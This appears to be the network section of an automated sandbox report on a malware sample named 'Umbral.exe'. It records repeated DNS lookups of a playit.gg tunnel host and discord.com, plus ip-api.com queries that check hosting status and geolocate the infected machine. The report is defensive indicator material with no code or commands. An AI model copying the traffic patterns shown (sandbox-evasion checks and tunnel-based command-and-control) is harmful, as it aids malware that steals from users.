Sep 7, 2024 01:48:00.666349888 CEST | 1.1.1.1 | 192.168.2.5 | 0xa249 | No error (0) | ipbase.com | | 172.67.209.71 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:01.755742073 CEST | 1.1.1.1 | 192.168.2.5 | 0xbd4 | No error (0) | stage-von.gl.at.ply.gg | | 147.185.221.22 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:04.321928978 CEST | 1.1.1.1 | 192.168.2.5 | 0x7c1c | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:04.321928978 CEST | 1.1.1.1 | 192.168.2.5 | 0x7c1c | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:04.321928978 CEST | 1.1.1.1 | 192.168.2.5 | 0x7c1c | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:04.321928978 CEST | 1.1.1.1 | 192.168.2.5 | 0x7c1c | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:04.321928978 CEST | 1.1.1.1 | 192.168.2.5 | 0x7c1c | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:10.110718966 CEST | 1.1.1.1 | 192.168.2.5 | 0xece2 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:15.390836000 CEST | 1.1.1.1 | 192.168.2.5 | 0x3f99 | No error (0) | stage-von.gl.at.ply.gg | | 147.185.221.22 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:15.522228003 CEST | 1.1.1.1 | 192.168.2.5 | 0xf5c3 | No error (0) | freegeoip.app | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:15.522228003 CEST | 1.1.1.1 | 192.168.2.5 | 0xf5c3 | No error (0) | freegeoip.app | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:16.495884895 CEST | 1.1.1.1 | 192.168.2.5 | 0xeb72 | No error (0) | ipbase.com | | 104.21.85.189 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:16.495884895 CEST | 1.1.1.1 | 192.168.2.5 | 0xeb72 | No error (0) | ipbase.com | | 172.67.209.71 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:18.755196095 CEST | 1.1.1.1 | 192.168.2.5 | 0x8e03 | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:18.755196095 CEST | 1.1.1.1 | 192.168.2.5 | 0x8e03 | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:18.755196095 CEST | 1.1.1.1 | 192.168.2.5 | 0x8e03 | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:18.755196095 CEST | 1.1.1.1 | 192.168.2.5 | 0x8e03 | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:18.755196095 CEST | 1.1.1.1 | 192.168.2.5 | 0x8e03 | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:23.588996887 CEST | 1.1.1.1 | 192.168.2.5 | 0xe39 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:27.978957891 CEST | 1.1.1.1 | 192.168.2.5 | 0x7c4f | No error (0) | stage-von.gl.at.ply.gg | | 147.185.221.22 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:29.613620043 CEST | 1.1.1.1 | 192.168.2.5 | 0xba9c | No error (0) | freegeoip.app | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:29.613620043 CEST | 1.1.1.1 | 192.168.2.5 | 0xba9c | No error (0) | freegeoip.app | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:30.263555050 CEST | 1.1.1.1 | 192.168.2.5 | 0x3eaa | No error (0) | ipbase.com | | 172.67.209.71 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:30.263555050 CEST | 1.1.1.1 | 192.168.2.5 | 0x3eaa | No error (0) | ipbase.com | | 104.21.85.189 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:30.871162891 CEST | 1.1.1.1 | 192.168.2.5 | 0xb15d | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:30.871162891 CEST | 1.1.1.1 | 192.168.2.5 | 0xb15d | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:30.871162891 CEST | 1.1.1.1 | 192.168.2.5 | 0xb15d | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:30.871162891 CEST | 1.1.1.1 | 192.168.2.5 | 0xb15d | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:30.871162891 CEST | 1.1.1.1 | 192.168.2.5 | 0xb15d | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:35.437235117 CEST | 1.1.1.1 | 192.168.2.5 | 0x2334 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:39.524178028 CEST | 1.1.1.1 | 192.168.2.5 | 0xe054 | No error (0) | stage-von.gl.at.ply.gg | | 147.185.221.22 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:41.451378107 CEST | 1.1.1.1 | 192.168.2.5 | 0x6ec8 | No error (0) | freegeoip.app | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:41.451378107 CEST | 1.1.1.1 | 192.168.2.5 | 0x6ec8 | No error (0) | freegeoip.app | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:42.362329960 CEST | 1.1.1.1 | 192.168.2.5 | 0x46 | No error (0) | ipbase.com | | 104.21.85.189 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:42.362329960 CEST | 1.1.1.1 | 192.168.2.5 | 0x46 | No error (0) | ipbase.com | | 172.67.209.71 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:43.047307014 CEST | 1.1.1.1 | 192.168.2.5 | 0x125d | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:43.047307014 CEST | 1.1.1.1 | 192.168.2.5 | 0x125d | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:43.047307014 CEST | 1.1.1.1 | 192.168.2.5 | 0x125d | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:43.047307014 CEST | 1.1.1.1 | 192.168.2.5 | 0x125d | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:43.047307014 CEST | 1.1.1.1 | 192.168.2.5 | 0x125d | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:47.276027918 CEST | 1.1.1.1 | 192.168.2.5 | 0xd9d8 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:53.347131968 CEST | 1.1.1.1 | 192.168.2.5 | 0x50b4 | No error (0) | freegeoip.app | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:53.347131968 CEST | 1.1.1.1 | 192.168.2.5 | 0x50b4 | No error (0) | freegeoip.app | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:53.992722988 CEST | 1.1.1.1 | 192.168.2.5 | 0xca80 | No error (0) | ipbase.com | | 104.21.85.189 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:53.992722988 CEST | 1.1.1.1 | 192.168.2.5 | 0xca80 | No error (0) | ipbase.com | | 172.67.209.71 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:56.359555006 CEST | 1.1.1.1 | 192.168.2.5 | 0x5570 | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:56.359555006 CEST | 1.1.1.1 | 192.168.2.5 | 0x5570 | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:56.359555006 CEST | 1.1.1.1 | 192.168.2.5 | 0x5570 | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:56.359555006 CEST | 1.1.1.1 | 192.168.2.5 | 0x5570 | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:56.359555006 CEST | 1.1.1.1 | 192.168.2.5 | 0x5570 | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:48:59.015814066 CEST | 1.1.1.1 | 192.168.2.5 | 0xf3f | No error (0) | stage-von.gl.at.ply.gg | | 147.185.221.22 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:49:01.347398996 CEST | 1.1.1.1 | 192.168.2.5 | 0x89ee | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:49:07.129379034 CEST | 1.1.1.1 | 192.168.2.5 | 0xbc28 | No error (0) | freegeoip.app | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:49:07.129379034 CEST | 1.1.1.1 | 192.168.2.5 | 0xbc28 | No error (0) | freegeoip.app | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:49:07.992978096 CEST | 1.1.1.1 | 192.168.2.5 | 0xc900 | No error (0) | ipbase.com | | 104.21.85.189 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:49:07.992978096 CEST | 1.1.1.1 | 192.168.2.5 | 0xc900 | No error (0) | ipbase.com | | 172.67.209.71 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:49:10.794128895 CEST | 1.1.1.1 | 192.168.2.5 | 0xc1e | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:49:10.794128895 CEST | 1.1.1.1 | 192.168.2.5 | 0xc1e | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:49:10.794128895 CEST | 1.1.1.1 | 192.168.2.5 | 0xc1e | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:49:10.794128895 CEST | 1.1.1.1 | 192.168.2.5 | 0xc1e | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Sep 7, 2024 01:49:10.794128895 CEST | 1.1.1.1 | 192.168.2.5 | 0xc1e | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false
                                      • freegeoip.app
                                      • ipbase.com
                                      • discord.com
                                      • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 208.95.112.1 | 80 | 3056 | C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe
Timestamp | Bytes transferred | Direction | Data
Sep 7, 2024 01:47:01.671267986 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
Sep 7, 2024 01:47:02.147002935 CEST | 175 | IN | HTTP/1.1 200 OK
    Date: Fri, 06 Sep 2024 23:47:02 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 6
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
    Data Raw: 66 61 6c 73 65 0a
    Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49708 | 208.95.112.1 | 80 | 2316 | C:\Users\user\AppData\Local\Temp\Umbral.exe
Timestamp | Bytes transferred | Direction | Data
Sep 7, 2024 01:47:08.838840008 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
Sep 7, 2024 01:47:09.306864977 CEST | 175 | IN | HTTP/1.1 200 OK
    Date: Fri, 06 Sep 2024 23:47:09 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 6
    Access-Control-Allow-Origin: *
    X-Ttl: 52
    X-Rl: 43
    Data Raw: 66 61 6c 73 65 0a
    Data Ascii: false
Sep 7, 2024 01:47:09.628407955 CEST | 175 | IN | HTTP/1.1 200 OK
    Date: Fri, 06 Sep 2024 23:47:09 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 6
    Access-Control-Allow-Origin: *
    X-Ttl: 52
    X-Rl: 43
    Data Raw: 66 61 6c 73 65 0a
    Data Ascii: false


                                      Session ID 2 | Source 192.168.2.5:49731 | Destination 208.95.112.1:80 | PID 2316 | Process C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Sep 7, 2024 01:47:45.861299038 CEST | 55 bytes | OUT | GET /json/?fields=225545 HTTP/1.1
                                      Host: ip-api.com
                                      Sep 7, 2024 01:47:46.654433012 CEST | 379 bytes | IN | HTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:47:46 GMT
                                      Content-Type: application/json; charset=utf-8
                                      Content-Length: 202
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 15
                                      X-Rl: 42
                                      Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                      Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}
                                      Sep 7, 2024 01:47:46.654838085 CEST | 379 bytes | IN | HTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:47:46 GMT
                                      Content-Type: application/json; charset=utf-8
                                      Content-Length: 202
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 15
                                      X-Rl: 42
                                      Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                      Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}


                                      Session ID 3 | Source 192.168.2.5:49743 | Destination 208.95.112.1:80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Sep 7, 2024 01:47:53.281275034 CEST | 80 bytes | OUT | GET /line/?fields=hosting HTTP/1.1
                                      Host: ip-api.com
                                      Connection: Keep-Alive
                                      Sep 7, 2024 01:47:53.739532948 CEST | 174 bytes | IN | HTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:47:53 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 6
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 8
                                      X-Rl: 41
                                      Data Raw: 66 61 6c 73 65 0a
                                      Data Ascii: false


                                      Session ID 4 | Source 192.168.2.5:49753 | Destination 208.95.112.1:80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Sep 7, 2024 01:48:02.215751886 CEST | 55 bytes | OUT | GET /json/?fields=225545 HTTP/1.1
                                      Host: ip-api.com
                                      Sep 7, 2024 01:48:02.799417019 CEST | 378 bytes | IN | HTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:48:02 GMT
                                      Content-Type: application/json; charset=utf-8
                                      Content-Length: 202
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 0
                                      X-Rl: 40
                                      Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                      Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}


                                      Session ID 5 | Source 192.168.2.5:49764 | Destination 208.95.112.1:80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Sep 7, 2024 01:48:10.116369963 CEST | 80 bytes | OUT | GET /line/?fields=hosting HTTP/1.1
                                      Host: ip-api.com
                                      Connection: Keep-Alive
                                      Sep 7, 2024 01:48:10.702446938 CEST | 175 bytes | IN | HTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:48:10 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 6
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 60
                                      X-Rl: 44
                                      Data Raw: 66 61 6c 73 65 0a
                                      Data Ascii: false
                                      Sep 7, 2024 01:48:10.897876024 CEST | 175 bytes | IN | HTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:48:10 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 6
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 60
                                      X-Rl: 44
                                      Data Raw: 66 61 6c 73 65 0a
                                      Data Ascii: false


                                      Session ID 6 | Source 192.168.2.5:49769 | Destination 208.95.112.1:80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Sep 7, 2024 01:48:16.339941978 CEST | 55 bytes | OUT | GET /json/?fields=225545 HTTP/1.1
                                      Host: ip-api.com
                                      Sep 7, 2024 01:48:16.903023958 CEST | 379 bytes | IN | HTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:48:16 GMT
                                      Content-Type: application/json; charset=utf-8
                                      Content-Length: 202
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 53
                                      X-Rl: 43
                                      Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                      Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}


                                      Session ID 7 | Source 192.168.2.5:49779 | Destination 208.95.112.1:80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Sep 7, 2024 01:48:23.594831944 CEST | 80 bytes | OUT | GET /line/?fields=hosting HTTP/1.1
                                      Host: ip-api.com
                                      Connection: Keep-Alive
                                      Sep 7, 2024 01:48:24.062818050 CEST | 175 bytes | IN | HTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:48:23 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 6
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 46
                                      X-Rl: 42
                                      Data Raw: 66 61 6c 73 65 0a
                                      Data Ascii: false


                                      Session ID 8 | Source 192.168.2.5:49783 | Destination 208.95.112.1:80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Sep 7, 2024 01:48:28.646040916 CEST | 55 bytes | OUT | GET /json/?fields=225545 HTTP/1.1
                                      Host: ip-api.com
                                      Sep 7, 2024 01:48:29.244957924 CEST | 379 bytes | IN | HTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:48:29 GMT
                                      Content-Type: application/json; charset=utf-8
                                      Content-Length: 202
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 41
                                      X-Rl: 41
                                      Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                      Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}


                                      Session ID 9 | Source 192.168.2.5:49794 | Destination 208.95.112.1:80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Sep 7, 2024 01:48:35.443100929 CEST | 80 bytes | OUT | GET /line/?fields=hosting HTTP/1.1
                                      Host: ip-api.com
                                      Connection: Keep-Alive
                                      Sep 7, 2024 01:48:35.938791037 CEST | 175 bytes | IN | HTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:48:35 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 6
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 34
                                      X-Rl: 40
                                      Data Raw: 66 61 6c 73 65 0a
                                      Data Ascii: false


                                      Session ID 10 | Source 192.168.2.5:49798 | Destination 208.95.112.1:80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Sep 7, 2024 01:48:40.707492113 CEST | 55 bytes | OUT | GET /json/?fields=225545 HTTP/1.1
                                      Host: ip-api.com
                                      Sep 7, 2024 01:48:41.192111015 CEST | 379 bytes | IN | HTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:48:41 GMT
                                      Content-Type: application/json; charset=utf-8
                                      Content-Length: 202
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 29
                                      X-Rl: 39
                                      Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                      Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}


                                      Session ID 11 | Source 192.168.2.5:49807 | Destination 208.95.112.1:80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Sep 7, 2024 01:48:47.281548023 CEST | 80 bytes | OUT | GET /line/?fields=hosting HTTP/1.1
                                      Host: ip-api.com
                                      Connection: Keep-Alive
                                      Sep 7, 2024 01:48:47.759125948 CEST | 175 bytes | IN | HTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:48:47 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 6
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 22
                                      X-Rl: 38
                                      Data Raw: 66 61 6c 73 65 0a
                                      Data Ascii: false


                                      Session ID 12 | Source 192.168.2.5:49812 | Destination 208.95.112.1:80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Sep 7, 2024 01:48:53.960026026 CEST | 55 bytes | OUT | GET /json/?fields=225545 HTTP/1.1
                                      Host: ip-api.com
                                      Sep 7, 2024 01:48:54.515522003 CEST | 379 bytes | IN | HTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:48:54 GMT
                                      Content-Type: application/json; charset=utf-8
                                      Content-Length: 202
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 16
                                      X-Rl: 37
                                      Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                      Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}


                                      Session ID 13 | Source 192.168.2.5:49822 | Destination 208.95.112.1:80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Sep 7, 2024 01:49:01.354572058 CEST | 80 bytes | OUT | GET /line/?fields=hosting HTTP/1.1
                                      Host: ip-api.com
                                      Connection: Keep-Alive
                                      Sep 7, 2024 01:49:01.843399048 CEST | 174 bytes | IN | HTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:49:01 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 6
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 8
                                      X-Rl: 36
                                      Data Raw: 66 61 6c 73 65 0a
                                      Data Ascii: false


                                      Session ID 14 | Source 192.168.2.5:49827 | Destination 208.95.112.1:80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Sep 7, 2024 01:49:08.684597015 CEST | 55 bytes | OUT | GET /json/?fields=225545 HTTP/1.1
                                      Host: ip-api.com
